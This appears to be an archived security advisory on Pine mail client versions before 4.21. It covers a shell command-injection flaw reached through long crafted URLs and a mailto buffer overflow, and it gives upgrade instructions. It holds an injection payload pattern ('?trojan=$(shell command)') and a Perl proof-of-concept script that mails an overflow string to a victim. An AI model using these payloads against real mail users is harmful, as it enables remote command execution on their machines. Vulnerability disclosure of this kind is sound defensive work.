COMMAND

    pine

SYSTEMS AFFECTED

    Pines prior to 4.21

PROBLEM

    Jim Hebert  found following.   This was  tested on  4.10 and 4.20.
    4.10 from "Red  Hat" rpm and  4.20 built from  pristine sources to
    slx build target. Both seem equally affected.

    A certain mailing Jim got occasionally recently had a url like

        http://something/some/cgi$12345

    Jom noticed viewing the url didn't seem to work right, and finally
    figured out that the url must get near enough to a shell to  allow
    environment variable expansion.

    A quick test was:

        echo 'setenv WWW www.securityfocus.com' >> .tcshrc
        source .tcshrc
        pine
        (view a link above like: http://$WWW )

    Doesn't  sound  dangerous/exploitable  yet,  right?  Well, imagine
    your shell is bash, someone  sends you a html formatted  mail, and
    the url is long:

        "Click here for cool stuff!"

    the  url  is  very  long,  long  enough that the dangerous part is
    elided when pine asks the user to confirm they want to visit  that
    page the url ends with something like:  ?trojan=$(shell command)

    The user says "yeah, sure,  visit that page" since they  don't see
    the dangerous part.

    At the  least least,  people put  your environment  variables into
    their webserver access logs.  At  most, people can get you to  run
    shell commands  (bad enough  by itself)  _and_ have  the output of
    them sent to them if they wish.

    Fyodor added following.  It's hard to say how dumb user should  be
    to actually to become a  victim of such exploitation.   Not saying
    that the bug shouldn't be fixed anywayz.  if anyone's interested:

        #!/usr/bin/perl
        $sploit="A" x 1078;
        $sploit .="\@1111"; # rh 6.0/pine4.10 would love return address  0x82d4528
	        # or higher..
        open(FOO,"| /usr/sbin/sendmail -t");
        print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n";
        print FOO "Mail me: mailto:$sploit";
        close(FOO);

    Pull  any  shellcode  you  like  (but  mind it should contain only
    printable characters 0x20-xff worked).

SOLUTION

    4.21 seems to  fix the problem  even though it's  not mentioned in
    the release notes.

    Caldera says that the proper solution is to upgrade to the  latest
    packages

        rpm -U pine-4.21-1.i386.rpm

    The upgrade packages can be found on Caldera's FTP site at:

        ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current/RPMS/

    The corresponding source code package can be found at:

        ftp://ftp.calderaystems.com/pub/OpenLinux/updates/2.3/current/SRPMS